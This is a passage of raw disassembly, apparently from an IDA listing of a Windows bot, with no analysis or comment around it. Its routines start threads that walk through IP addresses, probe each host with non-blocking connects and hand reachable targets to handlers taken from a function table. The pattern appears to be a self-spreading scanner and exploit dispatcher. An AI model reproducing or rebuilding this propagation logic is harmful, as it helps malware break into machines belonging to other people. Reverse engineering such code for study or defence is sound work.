; ExitThread sub_40B8A2 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40BA57 proc near ; CODE XREF: sub_401ACD+244Fp var_200 = byte ptr -200h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp sub esp, 200h push 0Bh call sub_40B33F test eax, eax pop ecx jle short loc_40BA93 mov eax, [ebp+arg_C] push ds:dword_4CB7A0[eax*8] call ds:dword_4CB6E0 ; inet_ntoa push eax lea eax, [ebp+var_200] push offset unk_431FF0 push eax call sub_41B886 add esp, 0Ch jmp short loc_40BAA6 ; --------------------------------------------------------------------------- loc_40BA93: ; CODE XREF: sub_40BA57+13j lea eax, [ebp+var_200] push offset unk_431FD0 push eax call sub_41B886 pop ecx pop ecx loc_40BAA6: ; CODE XREF: sub_40BA57+3Aj push 0 lea eax, [ebp+var_200] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 lea eax, [ebp+var_200] push eax call sub_4151AD add esp, 18h leave retn sub_40BA57 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40BACE proc near ; CODE XREF: sub_40C33D+4Fp var_210 = dword ptr -210h var_204 = byte ptr -204h var_4 = byte ptr -4 arg_10 = byte ptr 18h arg_90 = byte ptr 98h arg_110 = dword ptr 118h arg_130 = dword ptr 138h arg_138 = dword ptr 140h arg_13C = dword ptr 144h push ebp mov ebp, esp sub esp, 204h mov eax, [ebp+arg_130] push ebx cmp eax, 0FFFFFFFFh push esi jz loc_40BFA0 shl eax, 6 xor ebx, ebx cmp dword_431B0C[eax], ebx jz loc_40BFA0 push 5 call sub_40B33F test eax, eax pop ecx jnz loc_40BD55 mov eax, dword_429078 push edi mov esi, offset dword_4CD85C push 104h push esi push ebx mov ds:dword_4CDA6C, eax mov ds:dword_4CDA68, ebx call dword_427070 ; GetModuleFileNameA mov edi, offset byte_429110 push 103h push edi push offset dword_4CD960 call sub_41B5F0 mov eax, [ebp+arg_110] add esp, 0Ch cmp [ebp+arg_90], bl mov ds:dword_4CD858, eax mov eax, [ebp+arg_138] push 7Fh mov ds:dword_4CDAF0, eax jnz short loc_40BB81 lea eax, [ebp+arg_10] push eax push offset dword_4CDA70 call sub_41B5F0 add esp, 0Ch mov ds:dword_4CDAF4, 1 jmp short loc_40BB9B ; --------------------------------------------------------------------------- loc_40BB81: ; CODE XREF: sub_40BACE+94j lea eax, [ebp+arg_90] push eax push offset dword_4CDA70 call sub_41B5F0 add esp, 0Ch mov ds:dword_4CDAF4, ebx loc_40BB9B: ; CODE XREF: sub_40BACE+B1j push esi lea eax, [ebp+var_204] push ds:dword_4CDA6C push offset unk_42C55C push eax call sub_41B886 push ebx lea eax, [ebp+var_204] push 5 push eax call sub_40B0F7 add esp, 1Ch mov ds:dword_4CDA64, eax lea eax, [ebp+var_4] push eax push ebx push offset dword_4CD858 push offset sub_411797 push ebx push ebx call dword_42707C ; CreateThread mov ecx, ds:dword_4CDA64 imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_40BC09 loc_40BBF7: ; CODE XREF: sub_40BACE+139j cmp ds:dword_4CDAF8, ebx jnz short loc_40BC24 push 32h call dword_427078 ; Sleep jmp short loc_40BBF7 ; --------------------------------------------------------------------------- loc_40BC09: ; CODE XREF: sub_40BACE+127j call dword_42708C ; RtlGetLastWin32Error push eax lea eax, [ebp+var_204] push offset unk_432110 push eax call sub_41B886 add esp, 0Ch loc_40BC24: ; CODE XREF: sub_40BACE+12Fj lea eax, [ebp+var_204] push eax call sub_4151AD mov eax, ds:dword_4CB390 mov esi, offset dword_4CDB04 mov [esp+210h+var_210], 104h push esi push ebx mov ds:dword_4CDD14, eax mov ds:dword_4CDD10, ebx call dword_427070 ; GetModuleFileNameA push 103h push edi push offset dword_4CDC08 call sub_41B5F0 mov eax, [ebp+arg_110] add esp, 0Ch cmp [ebp+arg_90], bl mov ds:dword_4CDB00, eax mov eax, [ebp+arg_138] pop edi mov ds:dword_4CDD98, eax push 7Fh jnz short loc_40BCA5 lea eax, [ebp+arg_10] push eax push offset dword_4CDD18 call sub_41B5F0 add esp, 0Ch mov ds:dword_4CDD9C, 1 jmp short loc_40BCBF ; --------------------------------------------------------------------------- loc_40BCA5: ; CODE XREF: sub_40BACE+1B8j lea eax, [ebp+arg_90] push eax push offset dword_4CDD18 call sub_41B5F0 add esp, 0Ch mov ds:dword_4CDD9C, ebx loc_40BCBF: ; CODE XREF: sub_40BACE+1D5j push esi lea eax, [ebp+var_204] push ds:dword_4CDD14 push offset unk_4320DC push eax call sub_41B886 push ebx lea eax, [ebp+var_204] push 4 push eax call sub_40B0F7 add esp, 1Ch mov ds:dword_4CDD0C, eax lea eax, [ebp+var_4] push eax push ebx push offset dword_4CDB00 push offset sub_40E992 push ebx push ebx call dword_42707C ; CreateThread mov ecx, ds:dword_4CDD0C imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_40BD2D loc_40BD1B: ; CODE XREF: sub_40BACE+25Dj cmp ds:dword_4CDDA0, ebx jnz short loc_40BD48 push 32h call dword_427078 ; Sleep jmp short loc_40BD1B ; --------------------------------------------------------------------------- loc_40BD2D: ; CODE XREF: sub_40BACE+24Bj call dword_42708C ; RtlGetLastWin32Error push eax lea eax, [ebp+var_204] push offset unk_4320A8 push eax call sub_41B886 add esp, 0Ch loc_40BD48: ; CODE XREF: sub_40BACE+253j lea eax, [ebp+var_204] push eax call sub_4151AD pop ecx loc_40BD55: ; CODE XREF: sub_40BACE+35j mov eax, [ebp+arg_130] mov ecx, eax shl ecx, 6 cmp dword_431B14[ecx], ebx jz loc_40BE7E push 7 call sub_40B33F test eax, eax pop ecx jnz loc_40BE78 mov eax, ds:dword_4CE39C cmp [ebp+arg_90], bl mov ds:dword_4CD7C4, eax mov eax, [ebp+arg_110] mov ds:dword_4CD7B8, eax mov eax, [ebp+arg_138] mov ds:dword_4CD7C0, ebx mov ds:dword_4CD848, eax push 7Fh jnz short loc_40BDC9 lea eax, [ebp+arg_10] push eax push offset dword_4CD7C8 call sub_41B5F0 add esp, 0Ch mov ds:dword_4CD84C, 1 jmp short loc_40BDE3 ; --------------------------------------------------------------------------- loc_40BDC9: ; CODE XREF: sub_40BACE+2DCj lea eax, [ebp+arg_90] push eax push offset dword_4CD7C8 call sub_41B5F0 add esp, 0Ch mov ds:dword_4CD84C, ebx loc_40BDE3: ; CODE XREF: sub_40BACE+2F9j push ds:dword_4CD7C4 lea eax, [ebp+var_204] push offset unk_432078 push eax call sub_41B886 push ebx lea eax, [ebp+var_204] push 7 push eax call sub_40B0F7 add esp, 18h mov ds:dword_4CD7BC, eax lea eax, [ebp+var_4] push eax push ebx push offset dword_4CD7B8 push offset sub_40E6F0 push ebx push ebx call dword_42707C ; CreateThread mov ecx, ds:dword_4CD7BC imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_40BE50 loc_40BE3E: ; CODE XREF: sub_40BACE+380j cmp ds:dword_4CD850, ebx jnz short loc_40BE6B push 32h call dword_427078 ; Sleep jmp short loc_40BE3E ; --------------------------------------------------------------------------- loc_40BE50: ; CODE XREF: sub_40BACE+36Ej call dword_42708C ; RtlGetLastWin32Error push eax lea eax, [ebp+var_204] push offset unk_432040 push eax call sub_41B886 add esp, 0Ch loc_40BE6B: ; CODE XREF: sub_40BACE+376j lea eax, [ebp+var_204] push eax call sub_4151AD pop ecx loc_40BE78: ; CODE XREF: sub_40BACE+2A8j mov eax, [ebp+arg_130] loc_40BE7E: ; CODE XREF: sub_40BACE+298j shl eax, 6 cmp dword_431B10[eax], ebx jz loc_40BFA0 push 3 call sub_40B33F test eax, eax pop ecx jnz loc_40BFA0 mov esi, offset dword_4CE034 push 104h push esi push ebx call dword_427070 ; GetModuleFileNameA push 5Ch push esi call sub_41BE40 pop ecx cmp eax, ebx pop ecx jz short loc_40BEBF mov [eax], bl loc_40BEBF: ; CODE XREF: sub_40BACE+3EDj mov eax, dword_42907C mov ds:dword_4CE14C, ebx mov ds:dword_4CE138, eax lea eax, [ebp+arg_10] push eax push offset dword_4CDDAC call sub_41B886 mov eax, [ebp+arg_110] pop ecx pop ecx mov ds:dword_4CDDA8, eax mov ecx, [ebp+arg_138] push esi push ds:dword_4CE138 mov ds:dword_4CE144, ecx mov ecx, [ebp+arg_13C] push eax mov ds:dword_4CE148, ecx call sub_40AC10 pop ecx push eax lea eax, [ebp+var_204] push offset unk_42C4E4 push eax call sub_41B886 push ebx lea eax, [ebp+var_204] push 3 push eax call sub_40B0F7 add esp, 20h mov ds:dword_4CE140, eax lea eax, [ebp+var_4] push eax push ebx push offset dword_4CDDA8 push offset sub_40F0D6 push ebx push ebx call dword_42707C ; CreateThread mov ecx, ds:dword_4CE140 imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_40BF78 loc_40BF66: ; CODE XREF: sub_40BACE+4A8j cmp ds:dword_4CE154, ebx jnz short loc_40BF93 push 32h call dword_427078 ; Sleep jmp short loc_40BF66 ; --------------------------------------------------------------------------- loc_40BF78: ; CODE XREF: sub_40BACE+496j call dword_42708C ; RtlGetLastWin32Error push eax lea eax, [ebp+var_204] push offset unk_43200C push eax call sub_41B886 add esp, 0Ch loc_40BF93: ; CODE XREF: sub_40BACE+49Ej lea eax, [ebp+var_204] push eax call sub_4151AD pop ecx loc_40BFA0: ; CODE XREF: sub_40BACE+14j ; sub_40BACE+25j ... pop esi pop ebx leave retn sub_40BACE endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40BFA4 proc near ; CODE XREF: sub_40C125:loc_40C196p arg_0 = dword ptr 8 push ebp mov ebp, esp mov eax, [ebp+arg_0] push esi push 4 lea esi, ds:4CB7A0h[eax*8] lea eax, [ebp+arg_0] push esi push eax call sub_41C310 add esp, 0Ch push [ebp+arg_0] call ds:dword_4CB57C ; htonl inc eax push eax mov [ebp+arg_0], eax call ds:dword_4CB650 ; htonl mov [ebp+arg_0], eax lea eax, [ebp+arg_0] push 4 push eax push esi call sub_41C310 mov eax, [esi] add esp, 0Ch pop esi pop ebp retn sub_40BFA4 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40BFEC proc near ; CODE XREF: sub_40C125+69p var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 10h push esi or esi, 0FFFFFFFFh push [ebp+arg_0] mov [ebp+var_C], esi mov [ebp+var_8], esi mov [ebp+var_4], esi mov [ebp+var_10], esi call sub_41AFE0 cmp eax, 0Fh pop ecx jbe short loc_40C014 xor eax, eax jmp short loc_40C085 ; --------------------------------------------------------------------------- loc_40C014: ; CODE XREF: sub_40BFEC+22j lea eax, [ebp+var_10] push eax lea eax, [ebp+var_4] push eax lea eax, [ebp+var_8] push eax lea eax, [ebp+var_C] push eax push offset aD_D_D_D ; "%d.%d.%d.%d" push [ebp+arg_0] call sub_41C645 add esp, 18h cmp [ebp+var_C], esi jnz short loc_40C041 call sub_41B8E2 mov [ebp+var_C], eax loc_40C041: ; CODE XREF: sub_40BFEC+4Bj cmp [ebp+var_8], esi jnz short loc_40C04E call sub_41B8E2 mov [ebp+var_8], eax loc_40C04E: ; CODE XREF: sub_40BFEC+58j cmp [ebp+var_4], esi jnz short loc_40C05B call sub_41B8E2 mov [ebp+var_4], eax loc_40C05B: ; CODE XREF: sub_40BFEC+65j mov eax, [ebp+var_10] cmp eax, esi jnz short loc_40C067 call sub_41B8E2 loc_40C067: ; CODE XREF: sub_40BFEC+74j shl eax, 8 add eax, [ebp+var_4] mov ecx, [ebp+var_C] shl eax, 8 add eax, [ebp+var_8] shl eax, 8 add eax, ecx mov ecx, [ebp+arg_4] mov ds:dword_4CB7A0[ecx*8], eax loc_40C085: ; CODE XREF: sub_40BFEC+26j pop esi leave retn sub_40BFEC endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40C088 proc near ; CODE XREF: sub_40B8A2+59p ; sub_40C125+BBp var_120 = dword ptr -120h var_11C = dword ptr -11Ch var_1C = word ptr -1Ch var_1A = word ptr -1Ah var_18 = dword ptr -18h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 120h push ebx push esi push edi push 1 pop edi xor ebx, ebx push ebx push edi push 2 mov [ebp+var_4], edi call ds:dword_4CB6D4 ; socket mov esi, eax cmp esi, 0FFFFFFFFh jnz short loc_40C0B1 xor eax, eax jmp short loc_40C120 ; --------------------------------------------------------------------------- loc_40C0B1: ; CODE XREF: sub_40C088+23j mov eax, [ebp+arg_0] push [ebp+arg_4] mov [ebp+var_1C], 2 mov [ebp+var_18], eax call ds:dword_4CB654 ; htons mov [ebp+var_1A], ax lea eax, [ebp+var_4] push eax push 8004667Eh push esi call ds:dword_4CB6F0 ; ioctlsocket lea eax, [ebp+var_1C] push 10h push eax push esi call ds:dword_4CB5FC ; connect mov eax, [ebp+arg_8] mov [ebp+var_8], ebx mov [ebp+var_C], eax lea eax, [ebp+var_C] push eax lea eax, [ebp+var_120] push ebx push eax push ebx push ebx mov [ebp+var_11C], esi mov [ebp+var_120], edi call ds:dword_4CB63C ; select push esi mov edi, eax call ds:dword_4CB6EC ; closesocket xor eax, eax cmp edi, ebx setnle al loc_40C120: ; CODE XREF: sub_40C088+27j pop edi pop esi pop ebx leave retn sub_40C088 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40C125 proc near ; DATA XREF: sub_40C33D+13Bo var_2A8 = dword ptr -2A8h var_28C = byte ptr -28Ch var_20C = dword ptr -20Ch var_208 = byte ptr -208h var_1F8 = byte ptr -1F8h var_178 = byte ptr -178h var_16C = dword ptr -16Ch var_168 = dword ptr -168h var_164 = dword ptr -164h var_15C = dword ptr -15Ch var_158 = dword ptr -158h var_150 = byte ptr -150h var_140 = byte ptr -140h var_C0 = byte ptr -0C0h var_40 = dword ptr -40h var_3C = dword ptr -3Ch var_38 = dword ptr -38h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_20 = dword ptr -20h var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 28Ch mov eax, [ebp+arg_0] push ebx push esi push edi push 53h mov esi, eax pop ecx lea edi, [ebp+var_150] rep movsd mov esi, [ebp+var_2C] mov dword ptr [eax+148h], 1 mov eax, [ebp+var_28] mov [ebp+var_4], esi mov [ebp+arg_0], eax call dword_4270A8 ; GetTickCount push eax call sub_41B8D8 mov ebx, esi pop ecx imul ebx, 234h loc_40C16C: ; CODE XREF: sub_40C125+204j mov eax, dword_43E594[ebx] cmp ds:dword_4CB7A4[eax*8], 0 jz loc_40C32E cmp [ebp+var_10], 0 push eax jz short loc_40C196 lea eax, [ebp+var_150] push eax call sub_40BFEC pop ecx jmp short loc_40C19B ; --------------------------------------------------------------------------- loc_40C196: ; CODE XREF: sub_40C125+60j call sub_40BFA4 loc_40C19B: ; CODE XREF: sub_40C125+6Fj pop ecx mov edi, eax push [ebp+arg_0] push dword_43E594[ebx] push [ebp+var_3C] push edi call ds:dword_4CB6E0 ; inet_ntoa push eax lea eax, [ebp+var_28C] push offset unk_43216C push eax call sub_41B886 add esp, 18h lea eax, [ebp+var_28C] push eax lea eax, dword_43E390[ebx] push eax call sub_41B886 push [ebp+var_38] push [ebp+var_3C] push edi call sub_40C088 add esp, 14h cmp eax, 1 jnz loc_40C31E cmp [ebp+var_20], 0FFFFFFFFh jnz short loc_40C272 push offset dword_4CD7A0 call dword_4270D4 ; RtlEnterCriticalSection push [ebp+var_3C] push edi call ds:dword_4CB6E0 ; inet_ntoa push eax lea eax, [ebp+var_28C] push offset unk_432144 push eax call sub_41B886 add esp, 10h cmp [ebp+var_14], 0 jnz short loc_40C254 cmp [ebp+var_C0], 0 push 1 push [ebp+var_18] lea eax, [ebp+var_28C] push eax lea eax, [ebp+var_C0] jnz short loc_40C248 lea eax, [ebp+var_140] loc_40C248: ; CODE XREF: sub_40C125+11Bj push eax push [ebp+var_40] call sub_409A73 add esp, 14h loc_40C254: ; CODE XREF: sub_40C125+100j lea eax, [ebp+var_28C] push eax call sub_4151AD mov [esp+2A8h+var_2A8], offset dword_4CD7A0 call dword_4270D0 ; RtlLeaveCriticalSection jmp loc_40C31E ; --------------------------------------------------------------------------- loc_40C272: ; CODE XREF: sub_40C125+D0j push edi call ds:dword_4CB6E0 ; inet_ntoa push eax lea eax, [ebp+var_208] push eax call sub_41B886 mov eax, [ebp+var_20] pop ecx shl eax, 6 pop ecx add eax, offset aSym ; "sym" push eax lea eax, [ebp+var_178] push eax call sub_41B886 cmp [ebp+var_C0], 0 pop ecx pop ecx lea eax, [ebp+var_C0] jnz short loc_40C2B7 lea eax, [ebp+var_140] loc_40C2B7: ; CODE XREF: sub_40C125+18Aj push eax lea eax, [ebp+var_1F8] push eax call sub_41B886 mov eax, [ebp+var_40] pop ecx mov [ebp+var_20C], eax mov eax, [ebp+var_18] pop ecx mov [ebp+var_15C], eax mov eax, [ebp+var_14] sub esp, 0BCh mov [ebp+var_158], eax mov eax, [ebp+var_3C] push 2Fh mov [ebp+var_16C], eax mov eax, [ebp+var_20] pop ecx mov [ebp+var_168], esi mov [ebp+var_164], eax lea esi, [ebp+var_20C] mov edi, esp shl eax, 6 rep movsd call off_431B04[eax] mov esi, [ebp+var_4] add esp, 0BCh loc_40C31E: ; CODE XREF: sub_40C125+C6j ; sub_40C125+148j push 7D0h call dword_427078 ; Sleep jmp loc_40C16C ; --------------------------------------------------------------------------- loc_40C32E: ; CODE XREF: sub_40C125+55j push esi call sub_40B413 pop ecx push 0 call dword_4270CC ; ExitThread sub_40C125 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40C33D proc near ; DATA XREF: sub_401ACD+1F82o ; sub_401ACD+5C49o var_1DC = dword ptr -1DCh var_1CC = byte ptr -1CCh var_14C = byte ptr -14Ch var_13C = byte ptr -13Ch var_3C = dword ptr -3Ch var_38 = dword ptr -38h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_14 = dword ptr -14h var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 1CCh mov eax, [ebp+arg_0] push ebx push esi push edi push 53h mov esi, eax pop ecx lea edi, [ebp+var_14C] push 1 pop ebx rep movsd mov [eax+144h], ebx lea eax, [ebp+var_14C] push eax call ds:dword_4CB694 ; inet_addr mov ecx, [ebp+var_2C] sub esp, 14Ch lea esi, [ebp+var_14C] push 53h mov ds:dword_4CB7A0[ecx*8], eax pop ecx mov edi, esp rep movsd call sub_40BACE push 0Bh call sub_40B33F add esp, 150h cmp eax, ebx jnz short loc_40C40B mov esi, offset dword_4CD7A0 push esi call dword_4270DC ; RtlDeleteCriticalSection push 80000400h push esi call dword_4270D8 ; InitializeCriticalSectionAndSpinCount test eax, eax jnz short loc_40C40B lea eax, [ebp+var_1CC] push offset unk_432250 push eax call sub_41B886 xor ebx, ebx pop ecx cmp [ebp+var_10], ebx pop ecx jnz short loc_40C3F5 push ebx lea eax, [ebp+var_1CC] push [ebp+var_14] push eax lea eax, [ebp+var_13C] push eax push [ebp+var_3C] call sub_409A73 add esp, 14h loc_40C3F5: ; CODE XREF: sub_40C33D+99j lea eax, [ebp+var_1CC] push eax call sub_4151AD pop ecx pop edi pop esi xor eax, eax pop ebx leave retn 4 ; --------------------------------------------------------------------------- loc_40C40B: ; CODE XREF: sub_40C33D+63j ; sub_40C33D+7Fj mov eax, [ebp+var_2C] mov esi, dword_427078 mov edi, ebx mov ds:dword_4CB7A4[eax*8], ebx xor ebx, ebx cmp [ebp+var_20], 1 jb loc_40C4D8 loc_40C429: ; CODE XREF: sub_40C33D+195j push edi lea eax, [ebp+var_14C] push [ebp+var_2C] mov [ebp+var_24], edi push [ebp+var_38] push eax lea eax, [ebp+var_1CC] push offset unk_43221C push eax call sub_41B886 push ebx lea eax, [ebp+var_1CC] push 0Bh push eax call sub_40B0F7 mov [ebp+var_28], eax imul eax, 234h mov ecx, [ebp+var_2C] add esp, 24h mov dword_43E594[eax], ecx lea eax, [ebp+var_14C] push ebx push ebx push eax push offset sub_40C125 push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_28] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_40C4A3 loc_40C498: ; CODE XREF: sub_40C33D+164j cmp [ebp+var_4], ebx jnz short loc_40C4CA push 1Eh call esi ; Sleep jmp short loc_40C498 ; --------------------------------------------------------------------------- loc_40C4A3: ; CODE XREF: sub_40C33D+159j call dword_42708C ; RtlGetLastWin32Error push eax lea eax, [ebp+var_1CC] push offset unk_4321E4 push eax call sub_41B886 lea eax, [ebp+var_1CC] push eax call sub_4151AD add esp, 10h loc_40C4CA: ; CODE XREF: sub_40C33D+15Ej push 1Eh call esi ; Sleep inc edi cmp edi, [ebp+var_20] jbe loc_40C429 loc_40C4D8: ; CODE XREF: sub_40C33D+E6j cmp [ebp+var_30], ebx jz loc_40C582 mov eax, [ebp+var_30] imul eax, 0EA60h push eax call esi ; Sleep loc_40C4ED: ; CODE XREF: sub_40C33D+250j push [ebp+var_30] mov eax, [ebp+var_2C] push [ebp+var_38] mov eax, ds:dword_4CB7A0[eax*8] push eax call ds:dword_4CB6E0 ; inet_ntoa push eax lea eax, [ebp+var_1CC] push offset unk_4321A4 push eax call sub_41B886 add esp, 14h cmp [ebp+var_10], ebx jnz short loc_40C53B push ebx lea eax, [ebp+var_1CC] push [ebp+var_14] push eax lea eax, [ebp+var_13C] push eax push [ebp+var_3C] call sub_409A73 add esp, 14h loc_40C53B: ; CODE XREF: sub_40C33D+1DFj lea eax, [ebp+var_1CC] push eax call sub_4151AD mov eax, [ebp+var_2C] mov [esp+1DCh+var_1DC], 0BB8h mov ds:dword_4CB7A4[eax*8], ebx call esi ; Sleep push 0Bh call sub_40B33F cmp eax, 1 pop ecx jnz short loc_40C572 push offset dword_4CD7A0 call dword_4270DC ; RtlDeleteCriticalSection loc_40C572: ; CODE XREF: sub_40C33D+228j push [ebp+var_2C] call sub_40B413 pop ecx push ebx call dword_4270CC ; ExitThread loc_40C582: ; CODE XREF: sub_40C33D+19Ej ; sub_40C33D+25Dj mov eax, [ebp+var_2C] cmp ds:dword_4CB7A4[eax*8], 1 jnz loc_40C4ED push 7D0h call esi ; Sleep jmp short loc_40C582 sub_40C33D endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40C59C proc near ; DATA XREF: sub_40C669+7Bo ; sub_40C75A+7Bo var_BC = dword ptr -0BCh var_B8 = byte ptr -0B8h var_38 = dword ptr -38h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_20 = dword ptr -20h var_10 = word ptr -10h var_E = word ptr -0Eh var_C = dword ptr -0Ch arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 0BCh mov eax, [ebp+arg_0] push esi push edi push 2Bh pop ecx mov esi, eax lea edi, [ebp+var_BC] push 1 rep movsd pop esi mov [eax+0A8h], esi push 10h lea eax, [ebp+var_10] push 0 push eax call sub_41B590 add esp, 0Ch mov [ebp+var_10], 2 push [ebp+var_38] call ds:dword_4CB654 ; htons mov [ebp+var_E], ax mov eax, [ebp+var_28] push 6 push esi push 2 mov [ebp+var_C], eax call ds:dword_4CB6D4 ; socket mov esi, eax cmp esi, 0FFFFFFFFh jz short loc_40C65A lea eax, [ebp+var_10] push 10h push eax push esi call ds:dword_4CB5FC ; connect mov ecx, [ebp+var_2C] imul ecx, 234h cmp eax, 0FFFFFFFFh mov dword_43E59C[ecx], esi jz short loc_40C65A push [ebp+var_38] push [ebp+var_28] call ds:dword_4CB6E0 ; inet_ntoa push eax mov edi, offset dword_4CE164 push offset unk_432284 push edi call sub_41B886 push 0 lea eax, [ebp+var_B8] push [ebp+var_20] push edi push eax push [ebp+var_BC] call sub_409A73 push edi call sub_4151AD add esp, 28h loc_40C65A: ; CODE XREF: sub_40C59C+5Dj ; sub_40C59C+7Ej push esi call ds:dword_4CB6EC ; closesocket pop edi xor eax, eax pop esi leave retn 4 sub_40C59C endp ; =============== S U B R O U T I N E ======================================= ; Attributes: noreturn bp-based frame sub_40C669 proc near ; DATA XREF: sub_401ACD+603Fo var_134 = byte ptr -134h var_B4 = byte ptr -0B4h var_30 = dword ptr -30h var_24 = dword ptr -24h var_20 = dword ptr -20h var_C = dword ptr -0Ch var_8 = byte ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 134h push ebx mov ebx, [ebp+arg_0] push esi push edi push 2Bh mov esi, ebx pop ecx lea edi, [ebp+var_B4] rep movsd mov esi, dword_427078 mov dword ptr [ebx+0A4h], 1 xor edi, edi loc_40C697: ; CODE XREF: sub_40C669+ECj push [ebp+var_30] push [ebp+var_20] call ds:dword_4CB6E0 ; inet_ntoa push eax lea eax, [ebp+var_134] push offset unk_4322AC push eax call sub_41B886 lea eax, [ebp+var_134] push 1FFh push eax mov eax, [ebp+var_24] imul eax, 234h add eax, offset dword_43E390 push eax call sub_41B5F0 add esp, 1Ch lea eax, [ebp+var_8] push eax lea eax, [ebp+var_B4] push edi push eax push offset sub_40C59C push edi push edi call dword_42707C ; CreateThread cmp eax, edi mov [ebp+var_4], eax jz short loc_40C703 loc_40C6F8: ; CODE XREF: sub_40C669+98j cmp [ebp+var_C], edi jnz short loc_40C703 push 32h call esi ; Sleep jmp short loc_40C6F8 ; --------------------------------------------------------------------------- loc_40C703: ; CODE XREF: sub_40C669+8Dj ; sub_40C669+92j push [ebp+var_4] call dword_427068 ; CloseHandle push dword ptr [ebx+8Ch] mov [ebx+0A8h], edi call esi ; Sleep lea eax, [ebp+var_20] push 4 push eax lea eax, [ebp+arg_0] push eax call sub_41C310 add esp, 0Ch push [ebp+arg_0] call ds:dword_4CB57C ; htonl inc eax push eax mov [ebp+arg_0], eax call ds:dword_4CB650 ; htonl mov [ebp+arg_0], eax lea eax, [ebp+arg_0] push 4 push eax lea eax, [ebp+var_20] push eax call sub_41C310 add esp, 0Ch jmp loc_40C697 sub_40C669 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40C75A proc near ; DATA XREF: sub_401ACD+5D4Fo var_130 = byte ptr -130h var_B0 = dword ptr -0B0h var_AC = byte ptr -0ACh var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_14 = dword ptr -14h var_8 = dword ptr -8 var_4 = byte ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 130h push ebx mov ebx, [ebp+arg_0] push esi push edi push 2Bh mov esi, ebx pop ecx lea edi, [ebp+var_B0] rep movsd mov esi, dword_427078 mov dword ptr [ebx+0A4h], 1 xor edi, edi loc_40C788: ; CODE XREF: sub_40C75A+BCj push [ebp+var_2C] push [ebp+var_1C] call ds:dword_4CB6E0 ; inet_ntoa push eax lea eax, [ebp+var_130] push offset unk_432300 push eax call sub_41B886 lea eax, [ebp+var_130] push 1FFh push eax mov eax, [ebp+var_20] imul eax, 234h add eax, offset dword_43E390 push eax call sub_41B5F0 add esp, 1Ch lea eax, [ebp+var_4] push eax lea eax, [ebp+var_B0] push edi push eax push offset sub_40C59C push edi push edi call dword_42707C ; CreateThread cmp eax, edi mov [ebp+arg_0], eax jz short loc_40C7F4 loc_40C7E9: ; CODE XREF: sub_40C75A+98j cmp [ebp+var_8], edi jnz short loc_40C7F4 push 32h call esi ; Sleep jmp short loc_40C7E9 ; --------------------------------------------------------------------------- loc_40C7F4: ; CODE XREF: sub_40C75A+8Dj ; sub_40C75A+92j push [ebp+arg_0] call dword_427068 ; CloseHandle push dword ptr [ebx+8Ch] mov [ebx+0A8h], edi call esi ; Sleep mov eax, [ebp+var_2C] cmp eax, [ebp+var_28] jz short loc_40C81B inc [ebp+var_2C] jmp loc_40C788 ; --------------------------------------------------------------------------- loc_40C81B: ; CODE XREF: sub_40C75A+B7j push [ebp+var_1C] call ds:dword_4CB6E0 ; inet_ntoa push eax lea eax, [ebp+var_130] push offset unk_4322D4 push eax call sub_41B886 push edi lea eax, [ebp+var_130] push [ebp+var_14] push eax lea eax, [ebp+var_AC] push eax push [ebp+var_B0] call sub_409A73 push [ebp+var_20] call sub_40B413 add esp, 24h xor eax, eax pop edi pop esi pop ebx leave retn 4 sub_40C75A endp ; =============== S U B R O U T I N E ======================================= sub_40C867 proc near ; CODE XREF: sub_40CADB+Ep ; sub_40CADB+33p ... mov eax, ecx and dword ptr [eax+4], 0 and dword ptr [eax], 0 retn sub_40C867 endp ; =============== S U B R O U T I N E ======================================= sub_40C871 proc near ; CODE XREF: sub_40CADB+11Ep arg_0 = dword ptr 4 arg_4 = dword ptr 8 push ebx mov ebx, [esp+4+arg_4] push esi push edi mov esi, ecx push ebx call sub_41B4D5 mov edi, eax pop ecx test edi, edi jz short loc_40C8A3 push ebx push 0 push edi call sub_41B590 push ebx push [esp+1Ch+arg_0] push edi call sub_41C310 add esp, 18h mov [esi+4], ebx mov [esi], edi loc_40C8A3: ; CODE XREF: sub_40C871+14j mov eax, esi pop edi pop esi pop ebx retn 8 sub_40C871 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: 